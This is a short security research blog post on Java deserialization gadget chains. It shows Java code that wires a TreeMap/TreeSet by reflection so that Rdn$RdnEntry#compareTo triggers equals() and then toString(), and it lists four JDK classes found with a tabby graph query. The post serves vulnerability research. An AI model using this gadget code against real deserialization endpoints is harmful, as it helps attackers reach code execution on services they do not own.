0x01 TreeMap: four ways to trigger toString

The core idea is to use javax.naming.ldap.Rdn.RdnEntry#compareTo to trigger obj1.equals(obj2).

```java
import java.lang.reflect.Constructor;
import java.util.TreeMap;
import java.util.TreeSet;

// Object whose equals() ends up calling the argument's toString()
Object xstring = utils.createWithoutConstructor("com.sun.org.apache.xpath.internal.objects.XStringForFSB");
// Object xstring = utils.createWithoutConstructor("com.sun.org.apache.xpath.internal.objects.XString");
utils.setFieldValue(xstring, "m_obj", "2");
// The other two classes found below work the same way:
// Object xstring = utils.createWithoutConstructor("javax.sound.sampled.AudioFileFormat$Type");
// Object xstring = utils.createWithoutConstructor("javax.sound.sampled.AudioFormat$Encoding");

// Two RdnEntry objects with the same "type", so compareTo() falls through to value.equals(that.value)
Object rdnEntry1 = utils.createWithoutConstructor("javax.naming.ldap.Rdn$RdnEntry");
utils.setFieldValue(rdnEntry1, "type", "ysomap");
// objects1: the object whose toString() is to be reached (defined elsewhere in the original, not shown here)
utils.setFieldValue(rdnEntry1, "value", objects1);

Object rdnEntry2 = utils.createWithoutConstructor("javax.naming.ldap.Rdn$RdnEntry");
utils.setFieldValue(rdnEntry2, "type", "ysomap");
utils.setFieldValue(rdnEntry2, "value", xstring);
TreeSet treeSet = makeTreeSet(rdnEntry1, rdnEntry2);

// Build the TreeMap by wiring its internal nodes directly, so that compareTo() is not
// invoked while the object graph is being constructed (only when it is deserialized later)
public static TreeSet makeTreeSet(Object v1, Object v2) throws Exception {
    TreeMap<Object, Object> m = new TreeMap<>();
    utils.setFieldValue(m, "size", 2);
    utils.setFieldValue(m, "modCount", 2);
    Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
    // TreeMap.Entry(K key, V value, Entry<K,V> parent)
    Constructor<?> nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
    nodeCons.setAccessible(true);
    Object node = nodeCons.newInstance(v1, new Object[0], null);
    Object right = nodeCons.newInstance(v2, new Object[0], node);
    utils.setFieldValue(node, "right", right);
    utils.setFieldValue(m, "root", node);

    // TreeSet is backed by the TreeMap in its "m" field
    TreeSet set = new TreeSet();
    utils.setFieldValue(set, "m", m);
    return set;
}
```

javax.naming.ldap.Rdn.RdnEntry#compareTo (source shown as a screenshot in the original post)

Since `value` is attacker-controlled, obj1.equals(obj2) is controlled as well.

Use tabby to query equals() methods that reach java.lang.Object#toString through a single call edge:

```cypher
MATCH path = (n:Method {NAME: "equals"})-[:CALL]->(:Method {NAME0:"java.lang.Object#toString"}) where none(n in nodes(path) where n.CLASSNAME CONTAINS "com.fr")
RETURN path
```


After excluding the false positives and the ones that cannot be used:


What remains is exactly the handful of classes used above:

CLASSNAME: javax.sound.sampled.AudioFormat$Encoding

CLASSNAME: com.sun.org.apache.xpath.internal.objects.XStringForFSB

CLASSNAME: com.sun.org.apache.xpath.internal.objects.XString

CLASSNAME: javax.sound.sampled.AudioFileFormat$Type

Sigh, back in the day these would have been four CVEs.


https://unam4.github.io/2024/07/06/hessian_tostring/
Author: unam4
Published: July 6, 2024